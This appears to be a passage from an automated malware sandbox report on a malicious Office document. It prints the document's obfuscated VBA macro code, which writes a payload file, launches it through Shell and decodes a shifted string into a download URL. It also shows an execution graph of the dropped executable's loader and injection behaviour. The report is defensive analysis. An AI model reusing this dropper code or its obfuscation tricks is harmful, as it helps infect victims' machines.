                    Dim KTlJi(3 To 377) as Long

                    221

                    KTlJi(3) = (- 423 / 911) - 17

                    222

                    Dim B4lhk as String

                    223

                    B4lhk = CFq3n

                    CFq3n

                    224

                    . Type = 1

                    225

                    Dim D63dd as Long

                    226

                    D63dd = (973 + 343) + 33

                    227

                    Dim FDF4N as Byte

                    228

                    FDF4N = 16

                    229

                    Dim Y1Nl5(27 To 423) as String

                    230

                    Y1Nl5(27) = UDtTh

                    UDtTh

                    231

                    Dim Cs0R0(19 To 124) as String

                    232

                    Cs0R0(19) = "HfFAf"

                    233

                    Dim X1p7U as Long

                    234

                    X1p7U = (950 / 873) / 47

                    235

                    Dim R2c6v as String

                    236

                    R2c6v = D6zNx

                    D6zNx

                    237

                    Dim B34TO as Long

                    238

                    B34TO = (- 161 / 416) + 5

                    239

                    Dim TTFj2 as String

                    240

                    TTFj2 = NGKGP

                    NGKGP

                    241

                    Dim Nu4T2(0 To 1) as Long

                    242

                    Nu4T2(0) = (825 / 270) - 15

                    243

                    . Open

                    244

                    Dim DsPYr(58) as Byte

                    245

                    DsPYr(58) = 144

                    246

                    Dim Y4seF as String

                    247

                    Y4seF = "MiHQ1"

                    248

                    Dim LC6S4(10) as Byte

                    249

                    LC6S4(10) = 140

                    250

                    Dim T1aQ4 as Long

                    251

                    T1aQ4 = (- 451 - 427) + 12

                    252

                    Dim IOEQ4 as Byte

                    253

                    Dim OuZ8q as String

                    254

                    OuZ8q = Y2Jti

                    Y2Jti

                    255

                    Dim X281p(17 To 232) as Long

                    256

                    X281p(17) = (362 - 693) - 42

                    257

                    Dim R0y38 as Long

                    258

                    R0y38 = (- 428 / 908) + 11

                    259

                    Dim JlHnA(9 To 346) as Long

                    260

                    JlHnA(9) = (408 - 939) - 28

                    261

                    Dim D73Ej as Byte

                    262

                    Dim DVx10(6 To 28) as Long

                    263

                    DVx10(6) = (287 / 732) / 9

                    264

                    Dim Sd4C8 as Byte

                    265

                    Dim T2nwq as Byte

                    266

                    Dim FACoO(4 To 335) as Long

                    267

                    FACoO(4) = (- 383 + 419) / 20

                    268

                    Dim Lf858 as String

                    269

                    Lf858 = GLr0d

                    GLr0d

                    270

                    Dim OTSOx(4 To 464) as String

                    271

                    OTSOx(4) = "In832"

                    272

                    Dim GOewz(51) as Byte

                    273

                    GOewz(51) = 54

                    274

                    Dim PmB80(24) as Byte

                    275

                    PmB80(24) = 7

                    276

                    Dim Nm7yu as String

                    277

                    Nm7yu = "RUtlW"

                    278

                    Dim JP35x as String

                    279

                    JP35x = MvykX

                    MvykX

                    280

                    Dim M78t5(39) as Byte

                    281

                    M78t5(39) = 64

                    282

                    Dim Jqn4z(82) as Byte

                    283

                    Jqn4z(82) = 229

                    284

                    Dim HT1BL as Long

                    285

                    HT1BL = (956 / 463) + 39

                    286

                    Dim Sh6B5 as Long

                    287

                    Sh6B5 = (963 + 998) - 44

                    288

                    Dim ZVW1Y(65) as Byte

                    289

                    ZVW1Y(65) = 243

                    290

                    . Write SG07j

                    291

                    Dim UA6uq as String

                    292

                    UA6uq = "SxTq1"

                    293

                    Dim RXnfC(22 To 447) as Long

                    294

                    RXnfC(22) = (108 / 292) + 19

                    295

                    Dim HM2qo as Byte

                    296

                    Dim DR87R as String

                    297

                    DR87R = JS08j

                    JS08j

                    298

                    Dim JiK8G(91) as Byte

                    299

                    JiK8G(91) = 209

                    300

                    Dim Bd8PI(31) as Byte

                    301

                    Bd8PI(31) = 5

                    302

                    Dim KS30R(99) as Byte

                    303

                    KS30R(99) = 70

                    304

                    Dim J5Olx as String

                    305

                    J5Olx = N6b2y

                    N6b2y

                    306

                    Dim R4238(25 To 187) as Long

                    307

                    R4238(25) = (- 908 - 590) + 11

                    308

                    Dim Wa1rO as Byte

                    309

                    Wa1rO = 202

                    310

                    Dim JOHVE as Byte

                    311

                    JOHVE = 41

                    312

                    Dim ICvSv as String

                    313

                    ICvSv = Ace62

                    Ace62

                    314

                    Dim H0EKF(14 To 21) as String

                    315

                    H0EKF(14) = "KQaR1"

                    316

                    Dim EQbHq(27 To 288) as String

                    317

                    EQbHq(27) = "S1B2c"

                    318

                    Dim T5AC3(4 To 269) as String

                    319

                    T5AC3(4) = "EQoob"

                    320

                    Dim Hdkk7(25 To 393) as Long

                    321

                    Hdkk7(25) = (- 873 / 710) + 16

                    322

                    Dim JPIU3(62) as Byte

                    323

                    JPIU3(62) = 29

                    324

                    Dim LKlOJ as String

                    325

                    LKlOJ = "HIdCG"

                    326

                    Dim Lxa6P(23 To 97) as String

                    327

                    Lxa6P(23) = "N7HO2"

                    328

                    Dim N7ds4 as Long

                    329

                    N7ds4 = (14 + 884) + 23

                    330

                    Dim J70a6(10 To 442) as String

                    331

                    J70a6(10) = "Jg4kN"

                    332

                    Dim VWgRj as String

                    333

                    VWgRj = "Um027"

                    334

                    Dim V0VyL as Byte

                    335

                    Dim O6DJP as Byte

                    336

                    Dim P0B8n as Byte

                    337

                    Dim NZm7o as String

                    338

                    NZm7o = A7h7X

                    A7h7X

                    339

                    Dim Wx1mB(28 To 46) as String

                    340

                    Wx1mB(28) = "IAqLs"

                    341

                    Nr0bV = 140

                    342

                    Dim W6cBD as Byte

                    343

                    Dim IE28H as Byte

                    344

                    Dim Ke3TM(44) as Byte

                    345

                    Ke3TM(44) = 34

                    346

                    Dim IIbp2 as Byte

                    347

                    Dim NS8bc(0) as Byte

                    348

                    NS8bc(0) = 29

                    349

                    Dim KjY57(16 To 90) as String

                    350

                    KjY57(16) = US5tA

                    US5tA

                    351

                    Dim E2fXs(8 To 68) as Long

                    352

                    E2fXs(8) = (54 / 242) - 45

                    353

                    Dim Dbq3a(0 To 1) as String

                    354

                    Dbq3a(0) = R0be7

                    R0be7

                    355

                    Dim Cdn4b(8 To 279) as Long

                    356

                    Cdn4b(8) = (- 1 / 232) - 21

                    357

                    Dim YHk1I as Byte

                    358

                    Dim D3AZC(8 To 375) as String

                    359

                    D3AZC(8) = "JhH55"

                    360

                    Dim EyMnI as Byte

                    361

                    EyMnI = 117

                    362

                    Dim Bmb52(77) as Byte

                    363

                    Bmb52(77) = 101

                    364

                    Dim X3bT0(25 To 125) as Long

                    365

                    X3bT0(25) = (151 - 755) - 34

                    366

                    Dim T5XW8 as Byte

                    367

                    T5XW8 = 9

                    368

                    Dim AjSXV as Byte

                    369

                    Redim RTkJ0(UBound(SG07j) + Nr0bV)

                    UBound

                    370

                    FWyLu = 62792

                    371

                    For Yc8Rn = 62792 To UBound(SG07j)

                    UBound

                    372

                    Ytg1B = A7fA2

                    A7fA2

                    373

                    GBdyo = Pt7t4

                    Pt7t4

                    374

                    M5omZ = O5Fw8

                    O5Fw8

                    375

                    G48Yg = 132

                    376

                    L733s = K83vS

                    K83vS

                    377

                    X0O3e = Nzfy5

                    Nzfy5

                    378

                    RTkJ0(Yc8Rn - 62792) = SG07j(Yc8Rn)

                    379

                    MG03r = XBsOm

                    XBsOm

                    380

                    NoDON = LBzBN

                    LBzBN

                    381

                    Next

                    UBound

                    382

                    Dim ZOoi3 as String

                    383

                    ZOoi3 = Bpcx3

                    Bpcx3

                    384

                    Dim Oq4O7(4 To 280) as Long

                    385

                    Oq4O7(4) = (550 - 414) / 24

                    386

                    Dim M5r4q as Long

                    387

                    M5r4q = (- 841 - 58) / 9

                    388

                    Dim PqC3P as String

                    389

                    PqC3P = "J052Y"

                    390

                    Dim XHDa8 as Long

                    391

                    XHDa8 = (- 935 + 672) - 34

                    392

                    Dim Btv4s(38) as Byte

                    393

                    Btv4s(38) = 22

                    394

                    Dim R2ek8(29 To 88) as String

                    395

                    R2ek8(29) = B2864

                    B2864

                    396

                    Dim OZmq5 as Long

                    397

                    OZmq5 = (498 - 852) + 25

                    398

                    Dim S8G87(59) as Byte

                    399

                    S8G87(59) = 254

                    400

                    Dim GwL48 as String

                    401

                    GwL48 = "VAZ1L"

                    402

                    Dim Ibh16 as Long

                    403

                    Ibh16 = (617 + 665) - 40

                    404

                    RTkJ0(G48Yg) = Nr0bV

                    405

                    Dim S02ZX as Long

                    406

                    S02ZX = (- 788 / 872) - 39

                    407

                    Dim S0omk as Byte

                    408

                    Dim X6nj0(26) as Byte

                    409

                    X6nj0(26) = 240

                    410

                    Dim K7BVf as Byte

                    411

                    K7BVf = 232

                    412

                    Dim HqBS3 as Byte

                    413

                    HqBS3 = 250

                    414

                    Dim BnoOq(4 To 241) as Long

                    415

                    BnoOq(4) = (675 - 7) + 35

                    416

                    Dim T43CU as String

                    417

                    T43CU = B3Q2l

                    B3Q2l

                    418

                    Dim M13Eo as Byte

                    419

                    M13Eo = 159

                    420

                    Dim L5af6 as String

                    421

                    L5af6 = "OSb7k"

                    422

                    Dim PXqeM(16) as Byte

                    423

                    PXqeM(16) = 100

                    424

                    Dim Ii745 as String

                    425

                    Ii745 = A35Ls

                    A35Ls

                    426

                    Dim ZmoPt as Byte

                    427

                    Dim JpmGb(10 To 74) as String

                    428

                    JpmGb(10) = "MJId0"

                    429

                    Dim YkN4C(9 To 421) as Long

                    430

                    YkN4C(9) = (800 - 56) + 7

                    431

                    Dim K58bD(18 To 66) as Long

                    432

                    K58bD(18) = (- 554 + 920) + 17

                    433

                    Dim Qktd2 as Long

                    434

                    Qktd2 = (338 - 233) - 14

                    435

                    Dim Gs8t8 as String

                    436

                    Gs8t8 = N578T

                    N578T

                    437

                    Open B78Bz For Binary As # 19

                    Open

                    438

                    Dim Uqt4K(18 To 483) as Long

                    439

                    Uqt4K(18) = (- 535 + 962) + 35

                    440

                    Dim HL8B8(40) as Byte

                    441

                    HL8B8(40) = 163

                    442

                    Dim FH3aW as String

                    443

                    FH3aW = U3038

                    U3038

                    444

                    Dim Pz62B(59) as Byte

                    445

                    Pz62B(59) = 168

                    446

                    Dim S303u(92) as Byte

                    447

                    S303u(92) = 61

                    448

                    Dim NW5wB as Long

                    449

                    NW5wB = (279 / 633) + 28

                    450

                    Dim Pp7vm(79) as Byte

                    451

                    Pp7vm(79) = 12

                    452

                    Dim D20d3 as Byte

                    453

                    D20d3 = 212

                    454

                    Dim SE0jN as String

                    455

                    SE0jN = "FPLi6"

                    456

                    Dim T86QH(2 To 75) as String

                    457

                    T86QH(2) = Y0SFj

                    Y0SFj

                    458

                    Dim XSppB as Long

                    459

                    XSppB = (667 / 48) + 4

                    460

                    Put # 19, , RTkJ0

                    461

                    Dim Mf17B(31 To 159) as Long

                    462

                    Mf17B(31) = (349 - 920) + 18

                    463

                    Dim AyHq1(27 To 332) as Long

                    464

                    AyHq1(27) = (- 390 + 749) + 19

                    465

                    Dim N6L1O as Long

                    466

                    N6L1O = (- 764 + 116) + 7

                    467

                    Dim JAYs7 as Byte

                    468

                    JAYs7 = 216

                    469

                    Dim P1h2Y(25 To 237) as String

                    470

                    P1h2Y(25) = EqDjd

                    EqDjd

                    471

                    Dim X1z36(43) as Byte

                    472

                    X1z36(43) = 200

                    473

                    Dim A4n88 as Long

                    474

                    A4n88 = (- 354 / 296) + 42

                    475

                    Dim UbRVW as Long

                    476

                    UbRVW = (- 535 / 642) / 32

                    477

                    Dim TU6xB as Long

                    478

                    TU6xB = (- 708 - 917) + 16

                    479

                    Dim K48Z4 as Byte

                    480

                    Dim EdHSW(7 To 484) as String

                    481

                    EdHSW(7) = "DX0mh"

                    482

                    Dim TeAB3 as Long

                    483

                    TeAB3 = (1 - 500) + 34

                    484

                    Close # 19

                    485

                    Dim J1Wo3 as String

                    486

                    J1Wo3 = "U0xEV"

                    487

                    Dim VF16a as String

                    488

                    VF16a = "S6WCJ"

                    489

                    Dim WcTgf as Long

                    490

                    WcTgf = (768 / 466) - 7

                    491

                    Dim JmG7I as String

                    492

                    JmG7I = "R21L5"

                    493

                    Dim J0t0N as Long

                    494

                    J0t0N = (- 891 / 842) / 5

                    495

                    Dim Mu8NH(86) as Byte

                    496

                    Mu8NH(86) = 250

                    497

                    Dim QA4Mr(7 To 148) as Long

                    498

                    QA4Mr(7) = (503 + 327) + 6

                    499

                    Dim C0PZL as Long

                    500

                    C0PZL = (- 388 + 134) + 30

                    501

                    Dim HrrCc(91) as Byte

                    502

                    HrrCc(91) = 57

                    503

                    Dim Hk0V0 as Long

                    504

                    Hk0V0 = (713 + 996) / 2

                    505

                    Dim Rb1h8 as Byte

                    506

                    Rb1h8 = 112

                    507

                    Dim U617W(12 To 96) as String

                    508

                    U617W(12) = J6Xnm

                    J6Xnm

                    509

                    Dim ZRCcY(30 To 393) as String

                    510

                    ZRCcY(30) = Gn0p5

                    Gn0p5

                    511

                    Dim P6yT0(59) as Byte

                    512

                    P6yT0(59) = 81

                    513

                    Dim YQZp0(66) as Byte

                    514

                    YQZp0(66) = 53

                    515

                    Dim Sa4Q0(0) as Byte

                    516

                    Sa4Q0(0) = 65

                    517

                    Dim WYHVk(1 To 106) as String

                    518

                    WYHVk(1) = "PGn02"

                    519

                    Dim Igsio(10 To 56) as String

                    520

                    Igsio(10) = "V20A1"

                    521

                    End With

                    522

                    Dim TY3vv as Long

                    523

                    TY3vv = (- 297 + 744) + 33

                    524

                    Dim RtUn3 as String

                    525

                    RtUn3 = X6RIx

                    X6RIx

                    526

                    Dim HT1LE(48) as Byte

                    527

                    HT1LE(48) = 60

                    528

                    Dim Kg17y(11) as Byte

                    529

                    Kg17y(11) = 227

                    530

                    Dim T6AE8 as Long

                    531

                    T6AE8 = (- 907 - 367) - 32

                    532

                    Dim D6KKC as Byte

                    533

                    Dim TOe3b as String

                    534

                    TOe3b = "CtDSH"

                    535

                    Dim BIXuv as Byte

                    536

                    BIXuv = 20

                    537

                    Dim DHJ31(10) as Byte

                    538

                    DHJ31(10) = 98

                    539

                    Dim A7OP0 as String

                    540

                    A7OP0 = TyTNz

                    TyTNz

                    541

                    Dim D2WGt(28 To 97) as Long

                    542

                    D2WGt(28) = (876 + 476) - 31

                    543

                    Dim URDqO(11 To 381) as Long

                    544

                    URDqO(11) = (103 - 251) - 31

                    545

                    Dim ZQQNT as Long

                    546

                    ZQQNT = (- 941 + 373) + 30

                    547

                    Dim U60S8 as Long

                    548

                    U60S8 = (- 290 + 803) + 20

                    549

                    Dim IVOcx as Byte

                    550

                    IVOcx = 200

                    551

                    Dim RmOJE(9 To 201) as String

                    552

                    RmOJE(9) = "Qgym7"

                    553

                    Dim C1E75(10 To 44) as String

                    554

                    C1E75(10) = "Gt7oe"

                    555

                    Dim UQkcM(91) as Byte

                    556

                    UQkcM(91) = 217

                    557

                    Dim Q2z35 as Byte

                    558

                    Q2z35 = 177

                    559

                    End Sub

                    Subroutine sh1, APIs: 10, Strings: 7, Number of lines: 92, Relevance: 25.592
                    APIsMeta Information

                    H0M0p

                    Kh1g3

                    W4t1q

                    K1jv6

                    W10rU

                    WK0I3

                    Shell

                    Yi5qQ

                    Td518

                    G4mfw

                    StringsDecrypted Strings
                    "XGe3h"
                    "M8V15"
                    "LBfNF"
                    "B0v6X"
                    "M3wGt"
                    "Qpo3B"
                    "VL6YB"
                    LineInstructionMeta Information
                    560

                    Public Sub sh1(F00qU)

                    561

                    Dim Ptc5o(13 To 200) as String

                    562

                    Ptc5o(13) = H0M0p

                    H0M0p

                    563

                    Dim ZaG8G(8 To 99) as Long

                    564

                    ZaG8G(8) = (162 + 318) - 21

                    565

                    Dim I5ig6(14 To 381) as String

                    566

                    I5ig6(14) = "XGe3h"

                    567

                    Dim Bpabn as String

                    568

                    Bpabn = "M8V15"

                    569

                    Dim DAF72 as String

                    570

                    DAF72 = "LBfNF"

                    571

                    Dim TKO2N as Long

                    572

                    TKO2N = (- 315 + 418) - 5

                    573

                    Dim L587f as Long

                    574

                    L587f = (- 185 - 760) - 7

                    575

                    Dim AAec6(34 To 341) as String

                    576

                    AAec6(34) = Kh1g3

                    Kh1g3

                    577

                    Dim Nm0Yv as Long

                    578

                    Nm0Yv = (415 - 106) + 43

                    579

                    Dim G6l8T(19 To 438) as String

                    580

                    G6l8T(19) = "B0v6X"

                    581

                    Dim LTFyB as Long

                    582

                    LTFyB = (- 448 + 490) + 36

                    583

                    Dim JQ6ao(16 To 331) as String

                    584

                    JQ6ao(16) = W4t1q

                    W4t1q

                    585

                    Dim T61ct(58) as Byte

                    586

                    T61ct(58) = 198

                    587

                    Dim ToH5N(9 To 217) as Long

                    588

                    ToH5N(9) = (670 - 498) / 32

                    589

                    Dim H65i1 as String

                    590

                    H65i1 = "M3wGt"

                    591

                    Dim Ulb3r(30 To 474) as Long

                    592

                    Ulb3r(30) = (886 + 165) + 27

                    593

                    Dim FTHZk(6 To 474) as String

                    594

                    FTHZk(6) = K1jv6

                    K1jv6

                    595

                    Dim X1MrK as Byte

                    596

                    Dim OOI2e as Long

                    597

                    OOI2e = (958 + 425) - 45

                    598

                    Dim I10aL(28 To 158) as Long

                    599

                    I10aL(28) = (256 / 317) + 4

                    600

                    Dim Md7Q6(26 To 100) as String

                    601

                    Md7Q6(26) = "Qpo3B"

                    602

                    Dim DtE35(25 To 292) as String

                    603

                    DtE35(25) = W10rU

                    W10rU

                    604

                    Dim BCl86(56) as Byte

                    605

                    BCl86(56) = 171

                    606

                    Dim S3G1Z as Byte

                    607

                    S3G1Z = 88

                    608

                    Dim Vp54V(31 To 165) as String

                    609

                    Vp54V(31) = WK0I3

                    WK0I3

                    610

                    Dim XVX82 as String

                    611

                    XVX82 = "VL6YB"

                    612

                    Shell F00qU

                    Shell

                    613

                    Dim TaG5l(36) as Byte

                    614

                    TaG5l(36) = 225

                    615

                    Dim BB7L8(5 To 168) as Long

                    616

                    BB7L8(5) = (- 165 / 193) + 26

                    617

                    Dim Lf1pz as Byte

                    618

                    Lf1pz = 76

                    619

                    Dim Z7x5a(28 To 292) as Long

                    620

                    Z7x5a(28) = (- 248 / 732) + 46

                    621

                    Dim XgI18 as Long

                    622

                    XgI18 = (778 - 317) + 27

                    623

                    Dim F4HU2(84) as Byte

                    624

                    F4HU2(84) = 113

                    625

                    Dim PgKgC(5) as Byte

                    626

                    PgKgC(5) = 166

                    627

                    Dim APvq3(20) as Byte

                    628

                    APvq3(20) = 139

                    629

                    Dim T8sNm(2 To 86) as Long

                    630

                    T8sNm(2) = (- 843 + 294) + 10

                    631

                    Dim H0KD2 as Long

                    632

                    H0KD2 = (664 / 688) - 11

                    633

                    Dim N2PIL as String

                    634

                    N2PIL = Yi5qQ

                    Yi5qQ

                    635

                    Dim Q37jQ as Byte

                    636

                    Q37jQ = 252

                    637

                    Dim Rrp7P as String

                    638

                    Rrp7P = Td518

                    Td518

                    639

                    Dim Y27e5(28 To 130) as Long

                    640

                    Y27e5(28) = (823 / 937) - 47

                    641

                    Dim QsI7W(66) as Byte

                    642

                    QsI7W(66) = 100

                    643

                    Dim Zy4bG(43) as Byte

                    644

                    Zy4bG(43) = 218

                    645

                    Dim Tg68A as Byte

                    646

                    Tg68A = 121

                    647

                    Dim I4ysJ as String

                    648

                    I4ysJ = G4mfw

                    G4mfw

                    649

                    Dim EKeB4(11 To 332) as Long

                    650

                    EKeB4(11) = (44 - 194) + 49

                    651

                    End Sub

                    Module: U2YLn

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "U2YLn"

                    Executed Functions
                    Function BjOEsxO3, APIs: 10, Strings: 2, Number of lines: 64, Relevance: 22.814
                    APIsMeta Information

                    OCkrm

                    AST0b

                    ZYu1R

                    HsaCb

                    Len

                    		Len("kwws=2264147;154<14962lpdjhv2orjr51sqj") -> 38

                    BbA1x

                    Chr

                    Asc

                    Mid

                    OjKf2

                    StringsDecrypted Strings
                    "GYv57"
                    "V7I6P"
                    LineInstructionMeta Information
                    2

                    Function BjOEsxO3(optional Wez36, optional randcif)

                    3

                    Dim YVBUd as Byte

                    executed
                    4

                    Dim K1txh(70) as Byte

                    5

                    K1txh(70) = 153

                    6

                    Dim K1oFf as String

                    7

                    K1oFf = "GYv57"

                    8

                    Dim P0K85 as Long

                    9

                    P0K85 = (236 - 686) / 2

                    10

                    Dim QDKu7(40) as Byte

                    11

                    QDKu7(40) = 95

                    12

                    Dim QHCci(15 To 388) as Long

                    13

                    QHCci(15) = (993 / 320) / 33

                    14

                    Dim XJLMD(97) as Byte

                    15

                    XJLMD(97) = 14

                    16

                    Dim LzTI8(33) as Byte

                    17

                    LzTI8(33) = 56

                    18

                    Dim W376U(2 To 177) as String

                    19

                    W376U(2) = OCkrm

                    OCkrm

                    20

                    Dim CkF05 as Long

                    21

                    CkF05 = (- 294 + 834) / 2

                    22

                    Dim I365r(34) as Byte

                    23

                    I365r(34) = 119

                    24

                    Dim OFNUb(94) as Byte

                    25

                    OFNUb(94) = 106

                    26

                    Dim FyNWs(15 To 422) as String

                    27

                    FyNWs(15) = AST0b

                    AST0b

                    28

                    Dim Ad61u as String

                    29

                    Ad61u = "V7I6P"

                    30

                    Dim M8yYX(6 To 242) as Long

                    31

                    M8yYX(6) = (- 686 - 221) / 49

                    32

                    Dim VSA4C as Byte

                    33

                    Dim NQ7c1 as Long

                    34

                    NQ7c1 = (- 813 / 193) + 36

                    35

                    Dim UTudO(95) as Byte

                    36

                    UTudO(95) = 224

                    37

                    Dim YW2oS(33 To 216) as Long

                    38

                    YW2oS(33) = (388 / 946) - 46

                    39

                    Dim Y7a3h(22 To 308) as Long

                    40

                    Y7a3h(22) = (- 268 + 837) - 9

                    41

                    Dim B8atH as String

                    42

                    B8atH = ZYu1R

                    ZYu1R

                    43

                    Dim CKC1u(23 To 217) as Long

                    44

                    CKC1u(23) = (215 + 644) - 47

                    45

                    Dim VNkBN as String

                    46

                    VNkBN = HsaCb

                    HsaCb

                    47

                    For i = 1 To Len(Wez36)

                    Len("kwws=2264147;154<14962lpdjhv2orjr51sqj") -> 38

                    executed
                    48

                    Dim ToR08 as String

                    49

                    ToR08 = BbA1x

                    BbA1x

                    50

                    K1AJP = K1AJP + Chr(Asc(Mid(Wez36, i, 1)) - 3)

                    Chr

                    Asc

                    Mid

                    51

                    Dim RB48x(59) as Byte

                    52

                    RB48x(59) = 202

                    53

                    Dim RuFGf as Long

                    54

                    RuFGf = (163 - 66) + 10

                    55

                    Next

                    Len("kwws=2264147;154<14962lpdjhv2orjr51sqj") -> 38

                    executed
                    56

                    Dim Qu53J as Byte

                    57

                    Qu53J = 0

                    58

                    Dim AX212 as String

                    59

                    AX212 = OjKf2

                    OjKf2

                    60

                    BjOEsxO3 = K1AJP

                    61

                    Dim QFj46(93) as Byte

                    62

                    QFj46(93) = 12

                    63

                    Dim Y8FMQ as Byte

                    64

                    Y8FMQ = 8

                    65

                    End Function

                    Reset < >

                      Analysis Process: text.doc.16147.scr PID: 3300 Parent PID: 3384 text.doc.16147.scrCOMMON

                      Execution Graph

                      Execution Coverage:40.8%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:13.9%
                      Total number of Nodes:599
                      Total number of Limit Nodes:96

                      Graph

                      execution_graph 2069 401000 GetModuleHandleA HeapCreate 2070 401026 GetLastError 2069->2070 2071 40101e 2069->2071 2073 40102c ExitThread 2070->2073 2075 401649 CreateThread 2071->2075 2076 40168b CreateThread 2075->2076 2077 40171d GetLastError 2075->2077 2752 401034 CreateMailslotA 2075->2752 2078 4016a7 WaitForSingleObject GetExitCodeThread 2076->2078 2079 401708 GetLastError 2076->2079 2737 4010fb 2076->2737 2080 401024 2077->2080 2081 4016f1 TerminateThread 2078->2081 2082 4016c6 2078->2082 2083 401711 CloseHandle 2079->2083 2080->2073 2085 4016fd CloseHandle 2081->2085 2082->2081 2084 4016cb WaitForSingleObject GetExitCodeThread 2082->2084 2083->2080 2084->2085 2086 4016df 2084->2086 2085->2083 2086->2085 2089 4015a3 VirtualAlloc 2086->2089 2090 4015d5 2089->2090 2092 401631 2089->2092 2101 40121c memcpy 2090->2101 2092->2085 2102 40126b 2101->2102 2104 4012ab 2101->2104 2103 40128c memcpy 2102->2103 2102->2104 2103->2102 2104->2092 2105 401398 2104->2105 2106 4013b2 2105->2106 2107 40148a 2105->2107 2106->2107 2112 4013bf 2106->2112 2107->2092 2114 401495 VirtualProtect 2107->2114 2108 4013c1 LoadLibraryA 2109 40147e 2108->2109 2110 4013d7 lstrlenA memset 2108->2110 2109->2107 2110->2112 2111 401425 GetProcAddress 2111->2112 2112->2108 2112->2109 2112->2111 2113 40143f lstrlenA memset 2112->2113 2113->2112 2115 401538 2114->2115 2116 4014cd 2114->2116 2115->2092 2119 401542 2115->2119 2116->2115 2117 40150b VirtualProtect 2116->2117 2117->2116 2118 401521 GetLastError 2117->2118 2118->2116 2143 4011f2 RtlAllocateHeap 2119->2143 2121 401553 2122 40159c 2121->2122 2125 401559 2121->2125 2130 1411096 2122->2130 2123 40155a GetModuleFileNameW 2124 40158b 2123->2124 2123->2125 2129 401599 2124->2129 2146 401207 HeapFree 2124->2146 2125->2123 2125->2124 2144 401207 HeapFree 2125->2144 2145 4011f2 RtlAllocateHeap 2125->2145 2129->2122 2131 1411107 InterlockedDecrement 2130->2131 2132 14110a7 2130->2132 2133 1411103 2131->2133 2140 1411116 2131->2140 2132->2133 2134 14110ae InterlockedIncrement 2132->2134 2133->2092 2134->2133 2135 14110c1 HeapCreate 2134->2135 2135->2133 2137 14110d7 2135->2137 2136 141114b HeapDestroy 2136->2133 2147 1411000 2137->2147 2138 1411124 SleepEx 2138->2140 2141 141113e CloseHandle 2138->2141 2140->2136 2140->2138 2140->2141 2141->2136 2142 14110ec CreateThread 2142->2133 2151 141105e 2142->2151 2143->2121 2144->2125 2145->2125 2146->2129 2149 141100c 2147->2149 2148 1411025 2148->2142 2149->2148 2150 1411032 memcpy 2149->2150 2150->2148 2154 141168a 2151->2154 2210 14129a4 CreateEventA 2154->2210 2156 1411076 2157 141198d ExitProcess 2158 14116ca WaitForSingleObject 2159 1411705 2158->2159 2160 14116b0 2158->2160 2192 1411855 2159->2192 2224 1413223 2159->2224 2160->2158 2160->2159 2160->2192 2216 1414365 lstrcpyn 2160->2216 2165 1411735 2166 141175d 2165->2166 2231 14115fb CreateFileW 2165->2231 2169 1411978 2166->2169 2239 141144f LoadLibraryA 2166->2239 2171 141197d GetLastError 2169->2171 2169->2192 2171->2192 2174 14117b2 2174->2171 2249 1413d84 2174->2249 2175 1412b45 8 API calls 2175->2174 2180 14117f7 lstrcatW 2181 1411810 2180->2181 2182 141180b 2180->2182 2185 141185b 2181->2185 2276 1413e06 2181->2276 2266 1411227 PathFindFileNameW lstrcmpiW 2182->2266 2289 141131a memset 2185->2289 2188 141184a 2342 1412d8c memset CoInitializeEx 2188->2342 2189 1411864 2189->2192 2195 141188a CreateEventA 2189->2195 2192->2156 2192->2157 2194 1411853 2194->2192 2196 14118d3 2195->2196 2197 14118a9 GetLastError 2195->2197 2296 1414253 RegOpenKeyExA 2196->2296 2198 14118b3 SetEvent Sleep ResetEvent 2197->2198 2199 14118cc CloseHandle 2197->2199 2198->2199 2199->2196 2202 141191f 2309 1413c1b 2202->2309 2203 141196c LocalFree 2203->2169 2205 1411905 DeleteFileW 2205->2202 2208 1411910 MoveFileExW 2205->2208 2206 1411929 2206->2169 2207 141192f CreateWaitableTimerA 2206->2207 2207->2203 2209 1411948 SetWaitableTimer CloseHandle 2207->2209 2208->2202 2209->2203 2211 14129c2 GetVersion 2210->2211 2212 1412a09 GetLastError 2210->2212 2213 1412a04 2211->2213 2214 14129cc GetCurrentProcessId OpenProcess 2211->2214 2213->2160 2215 14129f9 2214->2215 2215->2160 2217 14143aa 2216->2217 2218 1414470 2217->2218 2219 14143e2 VirtualAlloc 2217->2219 2218->2160 2219->2218 2220 1414412 2219->2220 2221 1414459 2220->2221 2222 1414448 memcpy 2220->2222 2223 1414460 VirtualFree 2221->2223 2222->2223 2223->2218 2225 1413235 OpenProcess 2224->2225 2226 1413246 2224->2226 2225->2226 2227 1411718 2226->2227 2228 141324a IsWow64Process 2226->2228 2227->2165 2317 1412a10 2227->2317 2229 1413259 2228->2229 2229->2227 2230 1413261 CloseHandle 2229->2230 2230->2227 2232 141167b GetLastError 2231->2232 2233 141161e CreateFileMappingW 2231->2233 2236 1411667 2232->2236 2234 1411639 MapViewOfFile 2233->2234 2235 141166c GetLastError 2233->2235 2237 1411649 GetFileSize 2234->2237 2238 141165f GetLastError 2234->2238 2235->2236 2236->2166 2237->2236 2238->2236 2240 1411468 2239->2240 2241 14114ab 2239->2241 2240->2241 2242 141147e GetModuleHandleA 2240->2242 2246 1412b45 2241->2246 2243 141148d 2242->2243 2243->2241 2244 1411493 FindWindowA 2243->2244 2244->2241 2245 14114a0 GetWindowThreadProcessId 2244->2245 2245->2241 2364 1412a7b NtOpenProcess 2246->2364 2252 1413d9c 2249->2252 2250 14117ce 2250->2169 2253 1411189 2250->2253 2252->2250 2377 14147d2 2252->2377 2382 1414161 2253->2382 2256 1411220 2256->2180 2256->2192 2259 1414631 6 API calls 2260 14111de 2259->2260 2260->2256 2261 1414631 6 API calls 2260->2261 2262 14111f2 2261->2262 2262->2256 2263 1414631 6 API calls 2262->2263 2264 1411203 HeapFree 2263->2264 2264->2256 2267 141130f 2266->2267 2268 141125e RegOpenKeyExA 2266->2268 2267->2181 2268->2267 2270 141128f lstrlenW RtlAllocateHeap 2268->2270 2271 1411304 RegCloseKey 2270->2271 2272 14112b9 RegQueryValueExW 2270->2272 2271->2267 2273 14112f6 HeapFree 2272->2273 2274 14112d6 StrStrIW 2272->2274 2273->2271 2274->2273 2275 14112f3 2274->2275 2275->2273 2277 141181e 2276->2277 2278 1413e27 OpenProcessToken 2276->2278 2277->2185 2277->2188 2324 1412cdf 2277->2324 2278->2277 2279 1413e42 GetTokenInformation GetTokenInformation 2278->2279 2280 1413eb5 CloseHandle 2279->2280 2281 1413e6f 2279->2281 2280->2277 2443 141115f RtlAllocateHeap 2281->2443 2283 1413e78 2284 1413eb4 2283->2284 2285 1413e7e 